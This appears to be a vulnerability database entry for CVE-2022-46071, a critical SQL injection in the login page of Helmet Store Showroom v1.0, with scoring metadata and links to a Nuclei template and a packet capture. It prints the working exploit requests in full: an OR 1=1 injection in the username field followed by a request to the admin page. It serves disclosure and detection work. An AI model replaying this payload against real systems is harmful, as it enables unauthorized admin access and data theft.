| Title | Helmet Store Showroom v1.0 - SQL Injection |
|---|---|
| Author | Harsh |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.74602 |
| CVE ID | CVE-2022-46071 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli admin-bypass helmet helmet_store_showroom_site_project vuln |
There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
POST /classes/Login.php?f=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
username='+OR+1%3D1+--+-&password=1234
GET /admin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46071.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-46071.pcap
N/AN/A